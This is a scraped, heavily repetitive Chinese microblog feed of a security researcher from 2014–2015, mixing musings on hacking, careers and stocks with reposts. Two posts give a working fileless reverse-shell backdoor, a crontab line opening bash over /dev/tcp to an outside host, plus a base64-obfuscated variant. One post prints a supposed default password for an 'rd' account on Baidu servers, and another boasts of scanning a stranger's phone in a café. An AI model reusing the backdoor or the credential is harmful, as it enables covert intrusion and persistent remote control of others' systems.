数据分析挑战:精细化的fuzz规则 -- WooYun(白帽子技术社区) -- 网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地又一个有意思的地方 ,实现10台机器分布式统计分析,而且你的程序应该能平滑扩展到更多的机器,支持更大的数据量。 将挑战结果私信我,你将能够参与到Tangscan(唐朝安全巡航)的研发,目前团队已获得红杉资本投资。 ringzero
2015-07-25
花费一天一夜写了一个巨复杂的代码,测试跟三个女生同时发微信后交往的可能性。里面涵盖了苦心计算的各种友好度估分,回复微信长度,回复等待时间,有没有图片,语音,女孩主动程度,每个都有分值。以及发送微信过去,预计收到的微信长度,等待时间,内容是否经典套话等。——面向对象のHackReal
ringzero
2015-07-21 来自 微博 weibo.com
学历远比想象的重要,读个好大学吧(除非你足够优秀,强到令人发指,可以让人忽略你的任何缺陷),那些鄙视学历的人,基本都是学历很搓的。
ringzero
2015-07-12 来自 微博 weibo.com
天才级的软件工程师只敢说接触过3个,这是天命。7分由你是颗卵子的时候就已决定,拥有绝佳的数学天赋、冷静缜密的逻辑、为解决难题宁愿不眠不休而深以为乐的技术热情;3分来自起步要早早早,恨不得同龄人玩泥巴的时候就得开始玩电脑,大学毕业前就突破一万小时法则,后面的已是游戏人生。
@tombkeeper:
我见的人越多,越感觉人生很大程度上是 GENE/MEME 决定的。有一个同事,孩子从小看他写程序,又跟着学,加入学校电脑协会后不久,会长找到他要让贤,说自己和他比起来实在没脸再当会长了。一个清华教授,孩子几岁时上了数学兴趣班,然后就不肯改上别的班,说学别的”就不能上特别有意思的数学课了”。
ringzero
2015-07-05 来自 微博 weibo.com
看了《黑客军团》,非常粗糙的一部骇客类电影,为了附和观众,刻意引入毒品、精神分裂、破坏毁灭、沟通障碍、不善交际等元素,从技术手法上讲,无法与乌云“路人甲”相比,连帽衫则更是最大的败笔。
ringzero
2015-07-04 来自 微博 weibo.com
国家为什么要救市?道理非常简单,急跌使得社会各个机构的筹码市值暴露在风险之中,会产生大量新的债务链危机,进而引发金融危机。如果缓跌,各个单位都能从容应对,就不存要救市了。
ringzero
2015-06-26 来自 微博 weibo.com
攻击和防御都进入了后现代的“机器自动化”时代,攻击和防御双方对待技术的开放程度决定了哪方拥有优势。对比以乌云为首的社区阵营(攻击技术)和以腾讯、阿里为首的SRC阵营(防御技术),就能清晰的看出其中端倪。
@ringzero:
十年前渗透测试的重心在于有耐心持续的实践自己的方法论,如今的核心在于工程化+自动化的复现。攻防之间的不对称在于,防御者要防御所有的面,而攻击者只要攻破其中一个面的一个点即可。防御者在所有的面上重兵布防,理论上可以但实际绝对做不到,攻击者自动化却可以做到全方位的打击。@赵彦_ayazero
ringzero
2015-06-26 来自 微博 weibo.com
安全对抗看成本,攻击方唯一需要投入的只有时间和学习成本。防御方完善一套安全防御体系,从0-60分需要1000w,60-80分需要2000w,80-90分需要5000w,90-95分需要2亿,而基于攻防之间的不对称,防御方的资源投入如果一直处于弱势,大多数时候也就只有被挨打的份。//@宫一鸣cn: 安全是资源的较量
@ringzero:
十年前渗透测试的重心在于有耐心持续的实践自己的方法论,如今的核心在于工程化+自动化的复现。攻防之间的不对称在于,防御者要防御所有的面,而攻击者只要攻破其中一个面的一个点即可。防御者在所有的面上重兵布防,理论上可以但实际绝对做不到,攻击者自动化却可以做到全方位的打击。@赵彦_ayazero
ringzero
2015-06-26 来自 微博 weibo.com
十年前渗透测试的重心在于有耐心持续的实践自己的方法论,如今的核心在于工程化+自动化的复现。攻防之间的不对称在于,防御者要防御所有的面,而攻击者只要攻破其中一个面的一个点即可。防御者在所有的面上重兵布防,理论上可以但实际绝对做不到,攻击者自动化却可以做到全方位的打击。@赵彦_ayazero
ringzero
2015-06-22 来自 微博 weibo.com
通过展示高收益操作来获取人群的认同,这是无数金融家的梦想。
ringzero
2015-06-21 来自 微博 weibo.com
计算机专业体系 大一到大四的在线课程 发现一张好图,大家快来看看~ ,如果实在难以忍受周围的环境,那就暗自努力练好本领,然后跳出那个圈子。
发现一张好图,大家快来看看~ ,如果实在难以忍受周围的环境,那就暗自努力练好本领,然后跳出那个圈子。 
ringzero
2015-06-19
每天早晨六点起来的秘诀在于晚上十点睡觉。
ringzero
2015-06-18 来自 微博 weibo.com
给你们说一个疯狂预测,360奇虎要回归国内,看前期与华远的合作造势,不知道会不会借壳华远地产呢?从压盘看与升华拜克前的走势一样,筹码集中度高,涨跌缓慢。
ringzero
2015-06-16 来自 微博 weibo.com
转发微博
ringzero
2015-06-11 来自 微博 weibo.com
@tombkeeper:
我感觉身边的朋友里,但凡不搞技术的,挣了钱之后生活品味都能上去。搞技术的,挣多少钱都还保持土土的本色,买个机械键盘就算奢侈品。下午一个朋友刚对外公布了把公司卖给阿里的消息,然后掏出手机搜快捷酒店准备晚上住。手机充电线还是破的,缠了一圈红塑料胶布。
ringzero
2015-06-10
《庄子》里提出了这样一个问题:成材的树往往被木匠砍走,不成材的树能够枝繁叶茂;会打鸣的公鸡能够颐养天年,不会打鸣的公鸡被杀了吃肉。树与公鸡,同样选择了“材”或“不材”,为什么有迥然不同的结局?
ringzero
2015-06-08 来自 微博 weibo.com
转发微博
@tombkeeper:
做产品以获得大众认可为标准,做技术以获得同行认可为标准。有很多东西是不为大众所知的,哪怕“可乐加曼妥思”也可能为你带来尖叫欢呼。但你自己得清楚,这就是个玩意儿。如果沉醉在这种尖叫欢呼里,唯一出路就是从骗自己走向骗别人。这十几年在我们这行里,也出过不少热衷于玩“可乐加曼妥思”的人。
ringzero
2015-06-05 来自 微博 weibo.com
此案例可写进电影剧本
@乌云-漏洞报告平台:
"show me the password"——当工程师们还在关注线上系统的时候,白帽子已经放眼未来开始展示线下测试带来的安全风险,结果证明成本低廉且效果恐怖。来看本案例:如何利用WiFi万能钥匙轻松进入京东内网,企业确实要警惕这些WiFi密码分享服务带来的入口风险了 网页链接
网页链接 长图 
ringzero
2015-05-28
这个时候一位黑客跳出来对携程说,前几天黑你们系统的时候,顺便下载了数据库和源代码,要不要借给你们用用?
@乌云-漏洞报告平台:
携程业务故障引发了各版本的“真相”在互联网疯传,什么物理删库、离职员工报复、管理员感情纠葛甚至连乌云君也被拉下水了……从11点到目前仍未解决问题也说明这是其自身甚至国内互联网都没遭遇过的重大事故。如果最终没有给出用户合理的解答,那才是应该愤怒的时候,现在还是多些理解与帮助吧 ![[钟]](./wy_files/o_zhong-03d3d3b3b2.png)
ringzero
2015-05-28 来自 微博 weibo.com
中国人的性情是总喜欢调和,折中的。譬如你说,这屋子太暗,须在这里开一个窗,大家一定不允许的。但如果你主张拆掉屋顶,他们就会来调和,愿意开窗了。没有更激烈的主张,他们总连平和的改革也不肯行。--鲁迅
ringzero
2015-05-28
堕落的底层人员是社会健康发展所必需的重要组成部分,如果所有人都上进,那就会变成每个人都非要付出巨大的努力才能活下来。
ringzero
2015-05-27 来自 微博 weibo.com
等到信息安全像体育那样流行&热门,校园里女生像瞩目体育明星那样瞩目信息安全明星的时候。。。那是不可能的,毕竟不管时间怎么变,校园女生始终还是看脸看身材。 @tombkeeper
@ringzero:
各种变相的安全竞赛满天飞,估摸着很快会有人折腾出全明星赛制,南北方梦之队大战三天三夜的娱乐玩法。
ringzero
2015-05-26 来自 微博 weibo.com
各种变相的安全竞赛满天飞,估摸着很快会有人折腾出全明星赛制,南北方梦之队大战三天三夜的娱乐玩法。
ringzero
2015-05-26 来自 微博 weibo.com
无论牛市、熊市,请牢记如下公式, 【三无利空】 丰厚 利润 = 牛股质地+交易者素质 = (热门概念+资本运作)+(长远眼光+恒久耐力) = (创新类+改革类)+(18种资本运作)+(长远眼光+恒久耐力)
ringzero
2015-05-24 来自 微博 weibo.com
转发微博
@qyuhen:
《Go 学习笔记》第四版 发布,qyuhen/book。基于 Go 1.4 重写了 100 多页的源码剖析,另有其他更新。
qyuhen/book。基于 Go 1.4 重写了 100 多页的源码剖析,另有其他更新。 ringzero
2015-05-26 来自 微博 weibo.com
各种变相的安全竞赛满天飞,估摸着很快会有人折腾出全明星赛制,南北方梦之队大战三天三夜的娱乐玩法。
ringzero
2015-05-26 来自 微博 weibo.com
无论牛市、熊市,请牢记如下公式, 【三无利空】 丰厚 利润 = 牛股质地+交易者素质 = (热门概念+资本运作)+(长远眼光+恒久耐力) = (创新类+改革类)+(18种资本运作)+(长远眼光+恒久耐力)
ringzero
2015-05-24 来自 微博 weibo.com
转发微博
@qyuhen:
《Go 学习笔记》第四版 发布,qyuhen/book。基于 Go 1.4 重写了 100 多页的源码剖析,另有其他更新。
qyuhen/book。基于 Go 1.4 重写了 100 多页的源码剖析,另有其他更新。 ringzero
2015-05-23 来自 微博 weibo.com
有那么一群不求商业利益的小明,不遗余力的想告诉世界网络有多么的不安全,于是披露了一些安全事件来证明,这群小明间接的把整个安全市场放大了几百倍。终于有一天,小明意识到自己一直在被另外一群人消费(当成一颗棋子),今天是白色的,明天又是黑色的。最后,小明的心碎了。。。
@tombkeeper:
要是有机会见到斯诺登,肯定得请他吃顿好的。没有他,我们的工作,都可以被高人轻轻松松归结为:“都是被迫害狂,什么理论上可以,等于废话”。不过听说高人最近也开始谈 APT 了。现实中的笑话真是幽默到梁左都编不出来。
![[噢耶]](./wy_files/lxh_oye-e8d4a6c9dd.png)
ringzero
2015-05-20 来自 iPhone 6 Plus
@tombkeeper:
写 PPT 写得头疼,今天得早点睡了。临睡前给你们讲个故事:
ringzero
2015-05-16 来自 微博 weibo.com
Y = X * 192 ,Y = X * 64 + X * 128,Y = X << 6 + X << 7,三种写法对应三个级别,细节都在一点一滴上。
ringzero
2015-05-16 来自 微博 weibo.com
越往下层,需要掌握的知识点越少,但是知识的迁移难度越大。想要快,没别的捷径,基础理论知识一定要弄通。
ringzero
2015-05-12 来自 微博 weibo.com
人类坚实基础的四大支柱,就是体能、意志、情绪、精神。
ringzero
2015-05-05 来自 微博 weibo.com
有时候,一些超级程序员看起来什么都知道,并且什么都能做,其实这只是幻觉。这些超级程序员通常都在一两个领域内非常精通,并且通过在精通的领域汲取了大量在很多领域里通用的知识和技术,从而达到一叶落知天下秋的境界。
ringzero
2015-05-02
转发微博
@cawan2000:
黑客纯属个人行为,只为满足自己对技术的好奇心而不断探索,从中寻找另类的乐趣。如果有缘碰上志同道合的,可以互相切磋,共享技术,一起进步。如果涉入工具链进行工程化和量产化的,叫信息探子,非法进行叫偷,合法叫窃,本质上没有分别。别扯上信息安全,这关乎大环境下系统化的东西,没有个人主义。
ringzero
2015-04-30
“Intrusion Kill Chain”模型精髓在于明确提出网络攻防过程中攻防双方互有优势,攻击者需要“步步为营”以完成攻击,而防御者可以在任一环节(从攻击入口到目标网络的关键路径)进行阻断,防守方若能阻断/瓦解攻击方的进攻组织环节,即可成功地挫败对手的攻击企图。
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV
ringzero
2015-04-30
Intrusion Kill Chain模型是将攻击者的攻击过程分解为如下七个步骤: Reconnaissance(踩点)、Weaponization(关键信息重组)、Delivery(匹配性探测)、Exploitation(尝试利用发现的弱点)、Installation(稳固入侵成果)、C2(控制维护)、Actions on Objectives(收割数据)。
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV
ringzero
2015-04-10 来自 微博 weibo.com
一个人去影院看了《王牌特工》,牛逼的始终还是科技,毕竟只是个搞笑片,整个观影过程感受到的都是:头可断,发型不能乱,血可流,皮鞋不能不擦油。
ringzero
2015-04-05 来自 微博 weibo.com
你可以不自己造轮子(重复造轮子),但应该了解轮子的构造,而且越详尽越好,造过轮子才能领悟其中的痛点,才可能提出更新的东西。配图:无限扩张的解析解引擎(双生机制),自学习自生成。
ringzero
2015-03-28
未来客户端类的漏洞,利用场景(不对互联网开放)、传播渠道(严重依赖服务端挂马——水坑攻击)、影响的数据(局限在在客户端使用者权限级别)越来越小,基于针对服务端的攻击理应越来越受重视。你们不能因为个人技术癖好而歧视脚本小子、搞WEB的、搞社工的,后面三者才是未来互联网安全的风向标
@ringzero:
互联网的进化经历了三个阶段:从文件(Files)通过文件夹(Folders)的组织形式存储在台式机(Desktop)中,到网页(Pages)以链接(Links)的方式形成网络(Web),再到数据流(Streams)借助标签(Tags)构成云(Cloud)。
ringzero
2015-03-28
互联网的进化经历了三个阶段:从文件(Files)通过文件夹(Folders)的组织形式存储在台式机(Desktop)中,到网页(Pages)以链接(Links)的方式形成网络(Web),再到数据流(Streams)借助标签(Tags)构成云(Cloud)。
ringzero
2015-03-24 来自 微博 weibo.com
Dark Side Ops: Custom Penetration Testing
ringzero
2015-03-23 来自 微博 weibo.com
尽可能的避免走入“每天重复而又熟识的区域”,熟悉区是个时空黑洞,会不断加速、消耗、吞噬你对时间的感官知觉与生理状态。如果你走出办公室,去陌生的国度一个月,去咖啡店办公一个月,就会发现这一个月并没有像办公室里那样(周三过完差不多就到周末了),而是会觉得比在办公室的两个星期都要多。
ringzero
2015-03-23 来自 微博 weibo.com
随着每年记忆的增量逐渐减少,如果你每天的工作和生活都是在简单重复,那么大脑中的“总数据”不会有儿时那样迅猛增长的趋势。如今处理重复的24小时,只需动用N年前习得的知识索引(驾轻就熟),总信息量几乎没有增加,你主观上感受到的“新东西”自然就少,而体验“新东西”恰恰是放慢主观时间的命门。
@ringzero:
五岁的时候人的记忆有五年,这时候过一年,到六岁时,记忆增加了五分之一。六岁到七岁,记忆增加了六分之一。七岁到八岁记忆就只增加了七分之一。以此类推,到二十岁的时候,过多一年,记忆便只增加二十分之一。这一年的时间总长虽然没变,但是对于生活感受的参照记忆变了,就会感觉时间过得越来越快。
ringzero
2015-03-23 来自 微博 weibo.com
五岁的时候人的记忆有五年,这时候过一年,到六岁时,记忆增加了五分之一。六岁到七岁,记忆增加了六分之一。七岁到八岁记忆就只增加了七分之一。以此类推,到二十岁的时候,过多一年,记忆便只增加二十分之一。这一年的时间总长虽然没变,但是对于生活感受的参照记忆变了,就会感觉时间过得越来越快。
ringzero
2015-03-23
如果没有提供好的机器、大的显示器、快速的硬盘、人体工程学桌椅、高速的网络和一个安静的,没有电话,没有会议,没有形式主义、朝令夕改、繁文缛节的环境,那么很多人的工作时间、工作效率实际上都被浪费掉了。我曾工作过的地方,哪怕管理层知道一点点,那效率几乎能翻两番。
ringzero
2015-03-20
稻盛和夫曾经说过一个故事,明治时期的手艺人被天皇召见,虽然都是不读书的乡下人,但一辈子兢兢业业地做一件事情,自然会有一股高贵的气质。那些稍微还有点理想的人,应该就是循着这种高贵的气质而去的吧。
ringzero
2015-02-23 来自 微博 weibo.com
ringzero
2015-02-20
转发微博
@cvnote计算机视觉笔记:
Probabilistic Programming & Bayesian Methods for Hackers | 黑客们的概率编程和贝叶斯方法书,电子版,有代码,介绍为主,减少推导。同时详细介绍了使用PyMC进行MCMC编程的细节。网页链接
网页链接 
ringzero
2015-02-17
用道德的帽子批评他人,逼人检讨(40年前的“斗私批修”)从来都是某体制搞垮别人的手段。因为一旦检讨,承认错误,就意味着“有了污点”,在气势上就“落了下风”。就算这会不整你,把柄缺落在别人手里了,随时随地可以翻出来,老帐新帐一起算。
ringzero
2015-02-12 来自 微博 weibo.com
在有些人眼中,好像任何人都会为了更广阔的商业机会而选择失去自己的声音,在另一些人眼中,他们认为你只是个窃取秘密隐私的工具,而在更多人眼中,你不过只是个盗号的。我们都知道,乌云迟早有一天会倒下,或这个原因或那个原因。但这个社会真的没什么值得你放弃和改变自我,理想也不能!
@乌云-漏洞报告平台:
我们是乌云,就是要站着,就是要任性!我们希望在新的一年里,互联网企业与相关组织都能够尊重和创造良好的安全氛围,任何违反漏洞公开原则的合作乌云都不会接受和认可。 我们是乌云,就是要站着,就是要任性!
我们是乌云,就是要站着,就是要任性! 
ringzero
2015-02-05 来自 微博 weibo.com
[Python脚本安全专家系列视频] SecurityTube - Python Scripting Expert ,内容涵盖:系统安全、网络嗅探和数据包重定向攻击、Web应用攻击、漏洞Exp技术、逆向工程、自动化攻击等。 下载地址:SecurityTube.Python.Scripting.Expert_免费高速下载|百度云 网盘-分享无限制
SecurityTube.Python.Scripting.Expert_免费高速下载|百度云 网盘-分享无限制 
ringzero
2015-01-29 来自 微博 weibo.com
回复@tombkeeper: 结对编程(英语:Pair programming)是一种敏捷软件开发的方法,两个程序员在一个计算机上共同工作。一个人输入代码,而另一个人审查他输入的每一行代码。两个程序员经常这样容易摩擦出火花。人们更不愿意打断两个结对的人,而单独工作的人却容易被打断。 //@tombkeeper:结对编程啊
![[笑cry]](./wy_files/d_xiaoku-7430606cb7.png)
ringzero
2015-01-28 来自 微博 weibo.com
问:在中国,2015你的网络生活谁来操盘?答:我操!
@中国新闻周刊:
【工信部回应VPN被封:不良信息应按中国法律管理】在国务院新闻办公室的新闻发布会上,有香港记者就“中国封杀部分VPN”一事进行提问。对此,工业和信息化部副部长毛伟明回答:在中国发展互联网一定要按照中国的法律法规来进行,一些不良信息应该按照中国法律进行管理。国新办就2014年全年工业通信业发展情况举行发布会
国新办就2014年全年工业通信业发展情况举行发布会 
ringzero
2015-01-26
*/60 * * * * a=`echo "ZXhlYyA5PD4gL2Rldi90Y3AvbG9jYWxob3N0LzgwODA7ZXhlYyAwPCY5O2V4ZWMgMT4mOSAyPiYxOy9iaW4vYmFzaCAtLW5vcHJvZmlsZSAtaQ=="|base64 -d`;/bin/bash -c "$a";unset a,运行时解密,脚本语言潜力无限,玩法各异
@ringzero:
(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab - ,一条命令实现无文件,兼容任意用户,任意Linux系统的反弹后门,对于懒惰的管理员来说,简直是杀人灭口、穿透网络之必备命令。
ringzero
2015-01-25 来自 微博 weibo.com
(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab - ,一条命令实现无文件,兼容任意用户,任意Linux系统的反弹后门,对于懒惰的管理员来说,简直是杀人灭口、穿透网络之必备命令。
ringzero
2015-01-23 来自 微博 weibo.com
有人说信用卡安全的最后一道防线是手机验证短信,但白帽子会向你们证明,最后一道防线早已崩溃在不负责任的移动运营商那!中国联通漏洞(网页链接),中国移动漏洞(网页链接),中国电信漏洞(WooYun.org | 需使用乌云白帽子账号登录才可以使用搜索功能。)
网页链接),中国移动漏洞(网页链接),中国电信漏洞(WooYun.org | 需使用乌云白帽子账号登录才可以使用搜索功能。) 
ringzero
2015-01-23 来自 微博 weibo.com
信用卡的有效期最长5年,5*12 = 也就是只要60次尝试就能穷举出来,我不知道那些一直说有效期可以保障用卡安全的专家怎么想的,CVV码3位数字,999次也可以穷举出来。银行业(招商银行)设计缺陷可被穷举攻击 网页链接
网页链接
@乌云-漏洞报告平台:
信用卡除了卡号,最敏感的就当属有效期与CVV码,这两个信息构成简单(3位数字与日期规律)银行在处理这些数据时往往会出现疏忽,导致通过设计缺陷就可以轻易猜解CVV等敏感信息,导致用户产生经济损失。交通银行业务流程审核逻辑不严导致可枚举任意信用卡cvv码 网页链接
网页链接 长图 
ringzero
2015-01-20 来自 微博 weibo.com
我是如何登录任意新浪微博用户的(王思聪微博演示) 我是如何登录任意新浪微博用户的(王思聪微博演示) | WooYun-2014-81836 | WooYun.org
我是如何登录任意新浪微博用户的(王思聪微博演示) | WooYun-2014-81836 | WooYun.org 
ringzero
2015-01-19
梦寐以求的黑客技术,谁能告诉我这个软件哪里有卖?
ringzero
2015-01-05 来自 微博 weibo.com
一些网站使用js动态生成Cookie,塔奇克马无法完成任务,只好引入JavaScript Headless解决方案,远的我们有phantomjs, 一个Headless的WebKit Driver,意味着可以无需GUI,完全模拟Chrome/Safari的操作。 近的有casperjs(基于phantomjs的好用封装),zombie(相比phantomjs的优势是可以和node集成)等。
ringzero
2015-01-01
2014,i'm so sorry.
ringzero
2014-12-31 来自 微博 weibo.com
解答乌云、知乎、微博上 #网络安全如何入门# 的提问。 “入门”是良好的动机,实践起来后你将会被目标驱动,直至无往不利。事实上,你完全可以在做任何事情的过程中学习!
@ringzero:
如果知识体系里的每一个知识点是图里的点,依赖关系是边的话,那么这个图一定不是一个有向无环图。因为学习A的经验可以帮助你学习B。因此,你不需要学习怎么样“入门”,因为这样的“入门”点根本不存在!你需要学习的是怎么样做一个比较大的东西,在这个过程中,你会很快地学会需要学会的东西的。
ringzero
2014-12-31 来自 微博 weibo.com
如果知识体系里的每一个知识点是图里的点,依赖关系是边的话,那么这个图一定不是一个有向无环图。因为学习A的经验可以帮助你学习B。因此,你不需要学习怎么样“入门”,因为这样的“入门”点根本不存在!你需要学习的是怎么样做一个比较大的东西,在这个过程中,你会很快地学会需要学会的东西的。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 
查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-11-14
随着气流上升的风筝,是一种没有实力也想飞得很高的存在。
ringzero
2014-10-20 来自 微博 weibo.com
echo 'MhxzKhl' | passwd --stdin rd,百度的每台服务器,都有一个密码为梅花香自苦寒来的rd用户
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
